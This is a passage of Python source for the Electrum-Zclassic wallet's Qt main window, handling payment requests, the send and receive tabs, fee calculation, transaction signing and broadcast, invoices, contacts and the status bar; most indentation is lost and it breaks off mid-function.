def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
addr = self.wallet.get_receiving_address() or ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Zclassic address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Zclassic address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
        completer.setCaseSensitivity(Qt.CaseInsensitive)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Zclassic transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
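            # Fee slider callback: persist the selected level (or static fee rate) in the
            # config, mirror it into the feerate field, and recompute the transaction fee.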
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
self.feerate_e.setAmount(fee_rate)
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
            if self.is_max:
                self.spend_max()
            else:
                self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
def on_fee_or_feerate(edit_changed, editing_finished):
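            # A manual edit of either the fee or the feerate field freezes that field and
            # deactivates the slider; blanking the field returns to automatic calculation.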
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if not edit_changed.get_amount():
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(140)
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_kb())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum-Zclassic tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.'))
QMessageBox.information(self, 'Fee rounding', text)
self.feerounding_icon = QPushButton(QIcon(':icons/info.png'), '')
self.feerounding_icon.setFixedWidth(30)
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', True):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
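        # Any manual edit of the amount cancels "Max" (send-all) mode; the Max button is
        # re-enabled once the field is empty again.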
def reset_max(t):
self.is_max = False
self.max_button.setEnabled(not bool(t))
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
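            # Recolour the amount / fee / feerate fields: red when funds are insufficient,
            # blue for auto-filled values, default for user-entered ones.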
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee_estimator = self.get_send_fee_estimator()
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
self.get_coins(), outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
traceback.print_exc(file=sys.stderr)
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
                if not displayed_feerate:
                    # fall back to the fee rate of the built tx, in sat/kB to match the rest of this method
                    displayed_feerate = fee * 1000 // size if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size / 1000) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = round(displayed_fee * 1000 / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(feerounding)
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(bool(feerounding))
if self.is_max:
amount = tx.output_value()
self.amount_e.setAmount(amount)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
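        # Typical usage (see e.g. sign_tx / show_seed_dialog below): decorate a method that
        # takes a 'password' keyword argument; the wrapper prompts the user and injects it.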
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
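    # A fee or feerate field counts as "frozen" once the user has modified it and it still
    # holds text or keyboard focus; do_update_fee() preserves frozen values when recalculating.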
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount()
amount = 0 if amount is None else amount
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if addr is None:
self.show_error(_('Zclassic Address is None'))
return
if _type == TYPE_ADDRESS and not bitcoin.is_address(addr):
self.show_error(_('Invalid Zclassic Address'))
return
if amount is None:
self.show_error(_('Invalid Amount'))
return
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee_estimator, tx_desc, coins = r
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status, msg = self.network.broadcast(tx)
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
if ack_status:
msg = ack_msg
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
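        # Handle a "zclassic:" URI: payment-request URIs (an "r" parameter, or a signed
        # name/sig pair) are fetched and delivered via the on_pr callback; plain URIs
        # fill the Send tab fields directly.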
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid zclassic URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_kb())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
l.setObjectName("addresses_container")
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove")+" %s "%addr +_("from your wallet?")):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
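        # Coins explicitly selected in the UI ("Spend from") take precedence over the
        # wallet's full set of spendable coins.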
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
            self.show_error(_('Cannot find payment request in wallet.'))
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
        outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2]) + ' ' + self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
fn = self.getSaveFileName(_("Save invoice to file"), "*.bip70")
if not fn:
return
            with open(fn, 'wb') as f:
                f.write(pr.raw)
            self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
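        # Expose every public command from commands.Commands in the console namespace;
        # calls are routed through Commands._run with the GUI password dialog.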
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum_zclassic.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
traceback.print_exc(file=sys.stderr)
self.show_error(str(e))
return
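            # The storage encryption password for hardware wallets is derived from the device
            # keystore, so the same derived password serves as both the old and the new password.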
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
